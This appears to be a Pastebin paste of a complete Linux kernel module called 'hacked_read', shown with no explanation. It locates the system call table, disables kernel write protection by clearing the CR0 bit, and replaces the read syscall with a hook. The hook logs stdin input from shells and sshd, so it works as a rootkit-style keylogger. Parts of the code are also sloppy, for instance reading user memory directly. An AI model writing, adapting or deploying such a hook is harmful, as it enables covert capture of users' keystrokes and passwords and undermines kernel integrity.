Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <linux/module.h>
- #include <linux/kernel.h>
- #include <linux/init.h>
- #include <linux/slab.h>
- #include <linux/string.h>
- #include <linux/syscalls.h>
- #include <linux/version.h>
- #include <linux/unistd.h>
- #include <linux/time.h>
- #include <linux/preempt.h>
- #include <linux/delay.h>
- #include <linux/cred.h>
- #include <linux/sched.h>
- #include <asm/uaccess.h>
- #include <asm/paravirt.h>
- #include <asm-generic/bug.h>
- #include <asm/segment.h>
- #include <asm/atomic.h>
- #define BUFFER_SIZE 512
- #define PID_MAX 32768
- #define MODULE_NAME "hacked_read"
- #define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
- #define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
- #define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
- #define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
- MODULE_DESCRIPTION( MODULE_NAME );
- MODULE_VERSION( "0.2" );
- MODULE_LICENSE( "GPL" );
- MODULE_AUTHOR( "module author <mail@domain.com>" );
- static DEFINE_SPINLOCK( mLock );
- static unsigned long ( *original_read ) ( const struct pt_regs *regs );
- void **sct;
- static unsigned long flags; // irq flags
- static atomic_t LOCK_NUMBER_ATOM = ATOMIC_INIT(0);
- static unsigned long long LOCK_NUMBER_ATOM_VAL;
- static bool pids[ PID_MAX ];
- static inline void rw_enable( void ) {
- asm volatile ( "pushq %rax \n"
- "movq %cr0, %rax \n"
- "andq $0xfffffffffffeffff, %rax \n"
- "movq %rax, %cr0 \n"
- "popq %rax " );
- }
- static inline uint64_t getcr0(void) {
- register uint64_t ret = 0;
- asm volatile (
- "movq %%cr0, %0\n"
- :"=r"(ret)
- );
- return ret;
- }
- static inline void rw_disable( register uint64_t val ) {
- asm volatile(
- "movq %0, %%cr0\n"
- :
- :"r"(val)
- );
- }
- static void* find_sym( const char *sym ) {
- static unsigned long faddr = 0; // static !!!
- // ----------- nested functions are a GCC extension ---------
- int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
- if( 0 == strcmp( (char*)data, sym ) ) {
- faddr = addr;
- return 1;
- } else return 0;
- };// --------------------------------------------------------
- kallsyms_on_each_symbol( symb_fn, (void*)sym );
- return (void*)faddr;
- }
- static unsigned long hacked_read_test( const struct pt_regs *regs ) {
- unsigned long r = 1;
- unsigned int fd = regs->di;
- char *buf = (char*) regs->si;
- atomic_inc( &LOCK_NUMBER_ATOM );
- pids[ task_pid_nr( current ) ] = true;
- r = original_read( regs );
- if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
- if ( strlen( buf ) > 0 )
- info( "hacked_read: %c\n", buf[ 0 ] );
- }
- atomic_dec( &LOCK_NUMBER_ATOM );
- pids[ task_pid_nr( current ) ] = false;
- return r;
- }
- int hacked_read_init( void ) {
- register uint64_t cr0;
- int cpu;
- sct = find_sym( "sys_call_table" );
- original_read = (void *)sct[ __NR_read ];
- for_each_present_cpu( cpu ) {
- spin_lock_irqsave( &mLock, flags );
- cr0 = getcr0( );
- rw_enable( );
- sct[ __NR_read ] = hacked_read_test;
- rw_disable( cr0 );
- spin_unlock_irqrestore( &mLock, flags );
- }
- info( "Module was loaded\n" );
- return 0;
- }
- void hacked_read_exit( void ) {
- register uint64_t cr0;
- int cpu;
- unsigned int i;
- for_each_present_cpu( cpu ) {
- spin_lock_irqsave( &mLock, flags );
- cr0 = getcr0( );
- rw_enable( );
- sct[__NR_read] = original_read;
- rw_disable( cr0 );
- spin_unlock_irqrestore( &mLock, flags );
- }
- LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
- while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
- info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
- for( i = 0; i < PID_MAX; i++ ) {
- if ( pids[ i ] ) {
- info( "Locked. pid = %d\n", i );
- }
- }
- msleep( 5000 );
- LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
- }
- info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
- info( "Module was unloaded\n" );
- }
- module_init( hacked_read_init );
- module_exit( hacked_read_exit );
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement